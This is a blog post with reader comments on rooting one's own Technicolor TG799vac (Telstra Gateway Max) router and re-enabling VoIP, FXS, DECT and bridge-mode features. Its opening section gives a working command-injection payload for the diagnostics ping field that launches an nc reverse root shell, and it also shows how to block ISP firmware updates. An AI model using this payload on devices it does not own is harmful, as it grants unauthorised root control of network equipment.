Hacking the Technicolor TG799vac (and unlocking features!)

 

The TG799vac, known more commonly in Australia as the “Telstra Gateway Max” is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, 2 x FXS ports for analogue ports, and an FXO port.

They are provided directly to Telstra – and as such, has Telstra branded firmware. There is no ‘generic’ firmware available that will just give you access to the modem as any other device you would purchase. Personally, I think this kind of sucks – as if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, DECT base station, FXO ports. That was the motivation to crack into this device and re-enable as many features as possible.

By default, the IP address of the modem will be 10.0.0.138. In this example, I use a desktop on 10.0.0.122.

First, we have to exploit the web interface to get root access to the device. This can be done by a flaw in IPv6 address validation on the web site – which will allow the web server to run arbitrary code. This is good – otherwise none of the rest would be possible.

Getting root access

On your desktop, we want to open a listening port. Ensure that your firewall will allow this though.
# nc -lvvp 10001

Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10.0.0.122 10001 -e /bin/sh

If all goes well, your modem will now connect to your desktop – and make available a root shell for you. NOTE: At this point, you won’t see any type of shell prompt, or error messages – so while you’ll get output of commands, it can get a little confusing.

First steps – change the root password, get dropbear (the SSH server) to run on boot – NOTE the lack of prompt:

passwd
Changing password for root
New password:
Retype password:
Password for root changed by root
echo 'dropbear &' > /etc/rc.local
reboot

You should now be able to SSH into your modem on on the LAN IP with the username root and password you set above.

$ ssh root@10.0.0.138
root@10.0.0.138's password:
 
BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)
  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------
 
Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
 
 
Hash config:         887a8c777ed8527277d7137ed9149816c889cf1d
Hash openwrt:        ca2463af2522fc727150f23d6e85005112e8e8eb
Hash kernel:         b295f29cce441d87cef07373bfb07b546f720db3
Hash technicolor:    021884ac6200cd08635043046d33a717336a3554
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash lte:            cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash custo:          85da3def73fee4e92f478d2b1afafdfc16235a81
Hash packages:       0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
 
Bootloader: 2.0.54
 
root@mygateway:~#

You’ll note straight away that the firmware is based on OpenWRT. This is always good – as it means that the majority of the OpenWRT configuration is applicable directly to this modem.

Disable software updates

A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest commenting out the following lines in /etc/config/cwmpd as follows:

option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'

I also recommend disabling the service:

# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable

Using bridge mode with dedicated PPPoE ethernet port

I use the AP on the device on my LAN – but I also use the modem purely in bridge mode – which means I want to dedicate a port to my router to allow it to do PPPoE to my ISP. Thankfully – standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

You’ll need to remove eth3 from the LAN vlan. This gives you the port right next to the WAN ethernet (which is eth3 – eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to get the WAN port to do this – as it seems to be configured differently – maybe at the switch level.

Enable web interface features

If you have the modem in bridge mode, the web interface is gutted compared to in routed mode.

Edit /www/lua/cards_limiter.lua and change the following function to:

function M.card_limited(info, cardname)
  ## Display all cards.
  return false

  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

Restart the web interface via: /etc/init.d/nginx restart

Configure a third party SIP provider

Edit /etc/config/mmpbxrvsipnet and use the following guide:

Under the heading sip_net, set:

  • primary_registrar to your SIP server – ie my.sipserver.com
  • primary_registrar_port to 5060
  • primary_proxy to your SIP server – ie my.sipserver.com
  • primary_proxy_port to 5060
  • Under the heading sip_profile_0, set:

  • user_name – your SIP username
  • uri – your SIP username
  • password – your SIP password
  • enabled – set to 1
  • Restart the mmpbxd service via /etc/init.d/mmpbxd restart

    If you have multiple SIP accounts to log into – and with different providers, you can duplicate the entire sip_net section under a different name and configure as per above. Set the profile network setting to point to the new section you have created.

    Enable the FXS ports

    To enable the FXS ports, set the relay_state parameter to ‘1’ in /etc/config/mmpbxbrcmfxsdev – eg for FXS port 2:

    config device 'fxs_dev_0'
            option user_friendly_name 'Phone 1'
            option comfort_noise 'silence'
            option echo_cancellation '1'
            option fax_transport 'inband_renegotiation'
            option t38_redundancy '1'
            option rtcp_interval '5000'
            #list codec_black_list 'G722'
            #list codec_black_list 'AMR-WB'
            option cw_cas_delay '758'
            option fxs_privacy_reason 'P'
            option fxs_unavailability_reason 'O'
            option fxs_port '2'
            option cid_display_date_enabled '1'
            option cid_display_calling_line_enabled '1'
            option cid_display_calling_party_name_enabled '1'
            option pos '0'
            option early_detect_faxmodem '0'
            option relay_state '1'
    

    SIP call routing

    Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section against sip_profile_0 and edit as needed. This is my setup to route sip_profile_1 to the first registered DECT device – and FXS port 1:

    config incoming_map
            option profile 'sip_profile_0'
            list device 'fxs_dev_0'
            list device 'dect_dev_1'
            list device 'dect_dev_2'
            list device 'dect_dev_3'
            list device 'dect_dev_4'
            list device 'dect_dev_5'
            list device 'sip_dev_0'
            list device 'sip_dev_1'
            list device 'sip_dev_2'
            list device 'sip_dev_3'
            list device 'sip_dev_4'
            list device 'sip_dev_5'
            list device 'sip_dev_6'
    
    config incoming_map
            option profile 'sip_profile_1'
            list device 'dect_dev_0'
            list device 'fxs_dev_1'
    

    Registering DECT handsets

    After enabling all the ‘cards’ via the web interface, the easy way is to start DECT paring via the web interface. Click on the Telephony card, then ‘Start’ the paring and follow the instructions for your handset. This was straight forward for me.

    Speeding up sync times

    If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a – so we can disable other modes in /etc/config/xdsl:

    config xdsl 'dsl0'
            #list multimode 'gdmt'
            #list multimode 'adsl2annexm'
            #list multimode 'adsl2plus'
            list multimode 'vdsl2'
            #list profile '8a'
            #list profile '8b'
            #list profile '8c'
            #list profile '8d'
            #list profile '12a'
            #list profile '12b'
            list profile '17a'
            option enabled '1'
            option eoc_vendor_id 'BETMMB'
            option handshake_switch_timeout '0'
            option demod_cap_value '0x90447a'
            option demod_cap_mask '0x90447a'
            option demod_cap2_value '0x790000'
            option demod_cap2_mask '0x790000'
            option aux_features_value '0x1064003'
            option aux_features_mask '0x1064003'
            option vdsl_cfg_flags_value '0x1200e00'
            option vdsl_cfg_flags_mask '0x1200000'
            option xdsl_cfg1_value '0x0'
            option xdsl_cfg1_mask '0x0'
            option xdsl_cfg2_value '0x0'
            option xdsl_cfg2_mask '0x0'
            option maxaggrdatarate '160000'
            option maxdsdatarate '110000'
            option maxusdatarate '40000'
            option eoc_serial_number 'YeahRight 799vac 16.3'
    

    Update history

    2017-09-02 – Initial revision of this document.
    2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.

      9 Responses to “Hacking the Technicolor TG799vac (and unlocking features!)”

    1. Do you know how disabling this hack and turn back modem to its default status please ?

    2. Anyway on DGA4130 (Technicolor AGTEF) SSH is enabled but using WinSCP or Putty I always get “access denied”. It seems that even if it says “password for root changed by root” and enabled the dropbear (ssh server) via the echo ‘dropbear &’ > /etc/rc.local command, after the reboot process SSH is enabled but it seems to not accepting the root password I’ve inserted before and I don’t know why.

      Maybe my Technicolor modem requires more hacking tweaks. Could you help me please ?

      • You might need to edit the file /etc/config/dropbear and allow it to use password auth.

        Mine looks like:

        config dropbear
                option enable '1'
                option PasswordAuth 'on'
                option RootPasswordAuth 'on'
                option Port         '22'
                option IdleTimeout '600'
        #       option BannerFile   '/etc/banner'
        
    3. Thanks for this….., Pity they fixed the exploit in the web pages in 17.1 but it seems I got to mine before any push happened.

      Stopped and disabled the update service, but it reappeared after reboot, so i mashed out the update URL with hashes like suggested
      #option acs_url ‘https://################################’

    4. Can I also add just for the sake of the search engines that most of this also applies to the iinet / internode issued TG–789 VDSL modems?

      Can I also note that on the TG-789 at least that you can enable dropbear ssh by editing the /etc/config/dropbear file instead of adding to the /etc/rc.local file.

      *** dropbear.orig 2017-09-08 09:40:16.532696000 +1000
      — dropbear 2017-09-08 09:41:10.828503662 +1000
      ***************
      *** 1,7 ****
      config dropbear
      ! option enable ‘0’
      ! option PasswordAuth ‘off’
      ! option RootPasswordAuth ‘off’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
      — 1,7 —-
      config dropbear
      ! option enable ‘1’
      ! option PasswordAuth ‘on’
      ! option RootPasswordAuth ‘on’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’

    5. It would be nice if someone finds out a new exploit on 17.1 to enable root access. I’ve now my modem fixed. 🙁

    6. Is there anyone who knows how switch from bank_2 to bank_1 ?

      My modem does not have telnet or ssh access. 🙁

     Leave a Reply

    You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

    (required)

    (required)